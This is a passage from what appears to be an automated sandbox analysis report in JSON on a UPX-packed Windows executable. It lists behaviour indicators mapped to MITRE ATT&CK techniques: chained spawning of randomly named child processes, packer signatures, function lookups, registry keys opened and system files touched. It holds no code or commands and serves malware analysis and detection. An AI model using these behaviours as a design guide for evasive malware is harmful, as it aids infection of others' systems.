\"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0002440.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"646228.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"646228.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"808828.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"808828.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6020448.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6020448.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"660206.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"660206.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"280844.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"280844.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nnvhlr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nnvhlr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xjpjtlp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xjpjtlp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tvlvjll.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tvlvjll.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"frphr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"frphr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nndjbrh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nndjbrh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"466842.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"466842.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f41c76@RPCRT4.dll\"\n \"15001600c03edb69@ADVAPI32.dll\"\n \"0e000f00703fdb69@ADVAPI32.dll\"\n \"0e000f00cc3fdb69@ADVAPI32.dll\"\n \"11001200b447db69@ADVAPI32.dll\"\n \"110012004848db69@ADVAPI32.dll\"\n \"120013008c48db69@ADVAPI32.dll\"\n \"12001300e448db69@ADVAPI32.dll\"\n \"14001500386edb69@ADVAPI32.dll\"\n \"14001500506edb69@ADVAPI32.dll\"\n \"14001500686edb69@ADVAPI32.dll\"\n \"17001800806edb69@ADVAPI32.dll\"\n \"0d000e00986edb69@ADVAPI32.dll\"\n \"11001200a86edb69@ADVAPI32.dll\"\n \"11001200bc6edb69@ADVAPI32.dll\"\n \"0f001000fc6fdb69@ADVAPI32.dll\"\n \"140015003c70db69@ADVAPI32.dll\"\n \"140015005470db69@ADVAPI32.dll\"\n \"0c000d009c70db69@ADVAPI32.dll\"\n \"0c000d00ac70db69@ADVAPI32.dll\"\n \"0e000f00bc70db69@ADVAPI32.dll\"\n \"0e000f00cc70db69@ADVAPI32.dll\"\n \"0b000c00dc70db69@ADVAPI32.dll\"\n \"180019001473db69@RPCRT4.dll\"\n \"130014004073db69@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"442800.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"282462.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"02006.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"248486.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"6002286.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"4484802.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"60480.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"682088.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"828684.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"44828.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"hnvfx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"ndtrth.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"pvvxhx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"vtttbl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"nbhbvdb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"dljfl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"lrxfh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"tnhhvv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"fhrbxhx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"lnvvbl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"64088.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"6022622.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"rxvbljj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000\n \"fpfntvj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FA0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"682088.exe\" called \"CreateProcessA\" with parameter \"c:\\828684.exe\" - (UID: 00000000-00005900)\n \"vtttbl.exe\" called \"CreateProcessA\" with parameter \"c:\\nbhbvdb.exe\" - (UID: 00000000-00003944)\n \"2044406.exe\" called \"CreateProcessA\" with parameter \"c:\\660206.exe\" - (UID: 00000000-00001164)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"442800.exe\" (UID: 00000000-00006016)\n Spawned process \"282462.exe\" (UID: 00000000-00005892)\n Spawned process \"02006.exe\" (UID: 00000000-00005764)\n Spawned process \"248486.exe\" (UID: 00000000-00004108)\n Spawned process \"6002286.exe\" (UID: 00000000-00005876)\n Spawned process \"4484802.exe\" (UID: 00000000-00004288)\n Spawned process \"60480.exe\" (UID: 00000000-00006076)\n Spawned process \"682088.exe\" (UID: 00000000-00005900)\n Spawned process \"828684.exe\" (UID: 00000000-00004100)\n Spawned process \"44828.exe\" (UID: 00000000-00006084)\n Spawned process \"hnvfx.exe\" (UID: 00000000-00004152)\n Spawned process \"ndtrth.exe\" (UID: 00000000-00002812)\n Spawned process \"pvvxhx.exe\" (UID: 00000000-00001372)\n Spawned process \"vtttbl.exe\" (UID: 00000000-00003944)\n Spawned process \"nbhbvdb.exe\" (UID: 00000000-00002272)\n Spawned process \"dljfl.exe\" (UID: 00000000-00004092)\n Spawned process \"lrxfh.exe\" (UID: 00000000-00004028)\n Spawned process \"tnhhvv.exe\" (UID: 00000000-00003628)\n Spawned process \"fhrbxhx.exe\" (UID: 00000000-00004372)\n Spawned process \"lnvvbl.exe\" (UID: 00000000-00003172)\n Spawned process \"64088.exe\" (UID: 00000000-00001072)\n Spawned process \"6022622.exe\" (UID: 00000000-00004004)\n Spawned process \"rxvbljj.exe\" (UID: 00000000-00003600)\n Spawned process \"fpfntvj.exe\" (UID: 00000000-00004244)\n Spawned process \"hxtbvp.exe\" (UID: 00000000-00003344)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has an writable section named \"UPX0\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has an writable section named \"UPX1\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has an writable section named \"UPX2\"\n \"466480.exe\" has an writable section named \"UPX0\"\n \"466480.exe\" has an writable section named \"UPX1\"\n \"466480.exe\" has an writable section named \"UPX2\"\n \"nfxflv.exe\" has an writable section named \"UPX0\"\n \"nfxflv.exe\" has an writable section named \"UPX1\"\n \"nfxflv.exe\" has an writable section named \"UPX2\"\n \"00680.exe\" has an writable section named \"UPX0\"\n \"00680.exe\" has an writable section named \"UPX1\"\n \"00680.exe\" has an writable section named \"UPX2\"\n \"xxdfh.exe\" has an writable section named \"UPX0\"\n \"xxdfh.exe\" has an writable section named \"UPX1\"\n \"xxdfh.exe\" has an writable section named \"UPX2\"\n \"604488.exe\" has an writable section named \"UPX0\"\n \"604488.exe\" has an writable section named \"UPX1\"\n \"604488.exe\" has an writable section named \"UPX2\"\n \"jvxvt.exe\" has an writable section named \"UPX0\"\n \"jvxvt.exe\" has an writable section named \"UPX1\"\n \"jvxvt.exe\" has an writable section named \"UPX2\"\n \"rjrxrhl.exe\" has an writable section named \"UPX0\"\n \"rjrxrhl.exe\" has an writable section named \"UPX1\"\n \"rjrxrhl.exe\" has an writable section named \"UPX2\"\n \"hptvf.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has an executable section named \"UPX0\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" has an executable section named \"UPX1\"\n \"466480.exe\" has an executable section named \"UPX0\"\n \"466480.exe\" has an executable section named \"UPX1\"\n \"nfxflv.exe\" has an executable section named \"UPX0\"\n \"nfxflv.exe\" has an executable section named \"UPX1\"\n \"00680.exe\" has an executable section named \"UPX0\"\n \"00680.exe\" has an executable section named \"UPX1\"\n \"xxdfh.exe\" has an executable section named \"UPX0\"\n \"xxdfh.exe\" has an executable section named \"UPX1\"\n \"604488.exe\" has an executable section named \"UPX0\"\n \"604488.exe\" has an executable section named \"UPX1\"\n \"jvxvt.exe\" has an executable section named \"UPX0\"\n \"jvxvt.exe\" has an executable section named \"UPX1\"\n \"rjrxrhl.exe\" has an executable section named \"UPX0\"\n \"rjrxrhl.exe\" has an executable section named \"UPX1\"\n \"hptvf.exe\" has an executable section named \"UPX0\"\n \"hptvf.exe\" has an executable section named \"UPX1\"\n \"rbffrbx.exe\" has an executable section named \"UPX0\"\n \"rbffrbx.exe\" has an executable section named \"UPX1\"\n \"nffbnt.exe\" has an executable section named \"UPX0\"\n \"nffbnt.exe\" has an executable section named \"UPX1\"\n \"88880.exe\" has an executable section named \"UPX0\"\n \"88880.exe\" has an executable section named \"UPX1\"\n \"60248.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"442800.exe\" (UID: 00000000-00006016)\n Spawned process \"282462.exe\" (UID: 00000000-00005892)\n Spawned process \"02006.exe\" (UID: 00000000-00005764)\n Spawned process \"248486.exe\" (UID: 00000000-00004108)\n Spawned process \"6002286.exe\" (UID: 00000000-00005876)\n Spawned process \"4484802.exe\" (UID: 00000000-00004288)\n Spawned process \"60480.exe\" (UID: 00000000-00006076)\n Spawned process \"682088.exe\" (UID: 00000000-00005900)\n Spawned process \"828684.exe\" (UID: 00000000-00004100)\n Spawned process \"44828.exe\" (UID: 00000000-00006084)\n Spawned process \"hnvfx.exe\" (UID: 00000000-00004152)\n Spawned process \"ndtrth.exe\" (UID: 00000000-00002812)\n Spawned process \"pvvxhx.exe\" (UID: 00000000-00001372)\n Spawned process \"vtttbl.exe\" (UID: 00000000-00003944)\n Spawned process \"nbhbvdb.exe\" (UID: 00000000-00002272)\n Spawned process \"dljfl.exe\" (UID: 00000000-00004092)\n Spawned process \"lrxfh.exe\" (UID: 00000000-00004028)\n Spawned process \"tnhhvv.exe\" (UID: 00000000-00003628)\n Spawned process \"fhrbxhx.exe\" (UID: 00000000-00004372)\n Spawned process \"lnvvbl.exe\" (UID: 00000000-00003172)\n Spawned process \"64088.exe\" (UID: 00000000-00001072)\n Spawned process \"6022622.exe\" (UID: 00000000-00004004)\n Spawned process \"rxvbljj.exe\" (UID: 00000000-00003600)\n Spawned process \"fpfntvj.exe\" (UID: 00000000-00004244)\n Spawned process \"hxtbvp.exe\" (UID: 00000000-00003344)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" was detected as \"UPX\" and name: \"Packer\"\n \"466480.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nfxflv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"00680.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xxdfh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"604488.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jvxvt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rjrxrhl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hptvf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rbffrbx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nffbnt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"88880.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"60248.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jtxbhtx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"lvjhvdf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"284804.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"466842.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0246246.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nndjbrh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"frphr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rlvbpdv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tdxhf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tvlvjll.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2686426.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4804844.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"466480.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nfxflv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"00680.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xxdfh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"604488.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jvxvt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjrxrhl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hptvf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rbffrbx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nffbnt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"88880.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"60248.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jtxbhtx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lvjhvdf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"284804.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"466842.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0246246.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nndjbrh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"frphr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rlvbpdv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tdxhf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tvlvjll.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2686426.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4804844.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"442800.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"442800.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"442800.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"442800.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"442800.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"442800.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" reads file \"c:\\934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" reads file \"c:\\442800.exe\"\n \"442800.exe\" reads file \"c:\\442800.exe\"\n \"442800.exe\" reads file \"c:\\282462.exe\"\n \"282462.exe\" reads file \"c:\\282462.exe\"\n \"282462.exe\" reads file \"c:\\02006.exe\"\n \"02006.exe\" reads file \"c:\\02006.exe\"\n \"02006.exe\" reads file \"c:\\248486.exe\"\n \"248486.exe\" reads file \"c:\\248486.exe\"\n \"248486.exe\" reads file \"c:\\6002286.exe\"\n \"6002286.exe\" reads file \"c:\\6002286.exe\"\n \"6002286.exe\" reads file \"c:\\4484802.exe\"\n \"4484802.exe\" reads file \"c:\\4484802.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\442800.EXE\"; Key: \"\"; Value: \"\")\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"442800.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"282462.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"02006.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"248486.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6002286.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4484802.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"60480.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"682088.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"828684.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"44828.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hnvfx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ndtrth.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pvvxhx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vtttbl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nbhbvdb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dljfl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lrxfh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tnhhvv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fhrbxhx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lnvvbl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"64088.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6022622.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rxvbljj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fpfntvj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" trying to touch file 